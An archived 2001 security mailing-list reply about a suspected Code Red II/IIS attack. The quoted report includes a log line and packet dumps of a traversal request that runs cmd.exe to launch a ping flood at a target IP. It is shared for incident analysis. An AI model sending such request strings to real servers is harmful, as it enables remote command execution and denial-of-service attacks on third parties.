Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool

From: Blake Frantz (blakeat_private)
Date: Tue Aug 07 2001 - 16:32:54 PDT

  • Next message: Ryan Russell: "Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool" 

    This attack appears to be more related to MS01-026 than Code Red.

-Blake

On Tue, 7 Aug 2001, Eyes to the Skies. wrote:

> Okay this is scary.
> 
> This looks like an attempt to use a CodeRed II infected system to
> perform a denial of service attack. I don't think I need to stress the
> severity of this.
> 
> ==> /var/log/apache/access_log <==
> [deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted
> target ip]+"-n"+7000+"-w"+0" 404 -
> 
> TCPDUMP: ( i have only removed the source, since editing out the target
> ip would bork the dump...)
> 
> 17:19:34.539092 xxx.xxx.xxx.3385 > tnt1a-31.flint.corecomm.net.ww
> w: P [bad tcp cksum 6ca7!] 792933628:792933745(117) ack 3456715952 win
> 16616 (DF
> ) (ttl 110, id 7881, len 157)
> 0x0000   4500 009d 1ec9 4000 6e06 f3dd d519 f9a4        E.....@.n.......
> 0x0010   d8d6 521f 0d39 0050 2f43 34fc ce09 4cb0        ..R..9.P/C4...L.
> 0x0020   5018 40e8 4446 0000 4745 5420 2f73 6372        P.@.DF..GET./scr
> 0x0030   6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f        ipts/..../winnt/
> 0x0040   7379 7374 656d 3332 2f63 6d64 2e65 7865        system32/cmd.exe
> 0x0050   3f2f 632b 7069 6e67 2e65 7865 2b22 2d76        ?/c+ping.exe+"-v
> 0x0060   222b 6967 6d70 2b22 2d74 222b 222d 6c22        "+igmp+"-t"+"-l"
> 0x0070   2b36 3530 3030 2b32 3133 2e32 352e 3933        +65000+213.25.93
> 0x0080   2e31 3230 2b22 2d6e 222b 3730 3030 2b22        .120+"-n"+7000+"
> 0x0090   2d77 222b 300d 0a0d 0a2b 300d 0a               -w"+0....+0..
> 17:19:34.539626 unknown ip 0
> 0x0000   0000 0000 4510 009d 0000 0000 ff06 c196        ....E...........
> 0x0010   d519 f9a4 d8d6 521f 0d39 0050 fc34 432f        ......R..9.P.4C/
> 0x0020   fc34 432f 5018 0860 7cff 0000 4745 5420        .4C/P..`|...GET.
> 0x0030   2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769        /scripts/..../wi
> 0x0040   6e6e 742f 7379 7374 656d 3332 2f63 6d64        nnt/system32/cmd
> 0x0050   2e65 7865 3f2f 632b 7069 6e67 2e65 7865        .exe?/c+ping.exe
> 0x0060   2b22 2d76 222b 6967 6d70 2b22 2d74 222b        +"-v"+igmp+"-t"+
> 0x0070   222d 6c22 2b36 3530 3030 2b32 3133 2e32        "-l"+65000+213.2
> 0x0080   352e 3933 2e31 3230 2b22 2d6e 222b 3730        5.93.120+"-n"+70
> 0x0090   3030 2b22 2d77 222b 300d 0a0d 0a2b 300d        00+"-w"+0....+0.
> 0x00a0   0a                                             .
> 
> 17:20:13.919075 xxx.xxx.xxx.xxx.4229 > tnt1a-31.flint.corecomm.net.ww
> w: P [bad tcp cksum 6ca7!] 841644777:841644894(117) ack 3492756124 win
> 16616 (DF
> ) (ttl 110, id 11022, len 157)
> 0x0000   4500 009d 2b0e 4000 6e06 e798 d519 f9a4        E...+.@.n.......
> 0x0010   d8d6 521f 1085 0050 322a 7ae9 d02f 3a9c        ..R....P2*z../:.
> 0x0020   5018 40e8 0814 0000 4745 5420 2f73 6372        P.@.....GET./scr
> 0x0030   6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f        ipts/..../winnt/
> 0x0040   7379 7374 656d 3332 2f63 6d64 2e65 7865        system32/cmd.exe
> 0x0050   3f2f 632b 7069 6e67 2e65 7865 2b22 2d76        ?/c+ping.exe+"-v
> 0x0060   222b 6967 6d70 2b22 2d74 222b 222d 6c22        "+igmp+"-t"+"-l"
> 0x0070   2b36 3530 3030 2b32 3133 2e32 352e 3933        +65000+213.25.93
> 0x0080   2e31 3230 2b22 2d6e 222b 3730 3030 2b22        .120+"-n"+7000+"
> 0x0090   2d77 222b 300d 0a0d 0a2b 300d 0a               -w"+0....+0..
> 
> 17:20:13.919639 unknown ip 0
> 0x0000   0000 0000 4510 009d 0000 0000 ff06 0000        ....E...........
> 0x0010   d519 f9a4 d8d6 521f 1085 0050 e97a 2a32        ......R....P.z*2
> 0x0020   e97a 2a32 5018 0860 5422 0000 4745 5420        .z*2P..`T"..GET.
> 0x0030   2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769        /scripts/..../wi
> 0x0040   6e6e 742f 7379 7374 656d 3332 2f63 6d64        nnt/system32/cmd
> 0x0050   2e65 7865 3f2f 632b 7069 6e67 2e65 7865        .exe?/c+ping.exe
> 0x0060   2b22 2d76 222b 6967 6d70 2b22 2d74 222b        +"-v"+igmp+"-t"+
> 0x0070   222d 6c22 2b36 3530 3030 2b32 3133 2e32        "-l"+65000+213.2
> 0x0080   352e 3933 2e31 3230 2b22 2d6e 222b 3730        5.93.120+"-n"+70
> 0x0090   3030 2b22 2d77 222b 300d 0a0d 0a2b 300d        00+"-w"+0....+0.
> 0x00a0   0a                                             .
> 
> 
> As an afterthought, I saw a url driting around, realated to such an
> idea. http://www.iispacket.com/ , although I am not getting that host to
> respond.
> 
> I thinks this needs immediate attention. I can't do it now, i must go to
> school.
> -- 
> 
>  http://c64.arcsnet.net/
>  ICQ UIN 1551505
>  "The things you own, they end up owning you." - Tylder Durden
> 
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com
> 
> 


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

    This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 17:30:14 PDT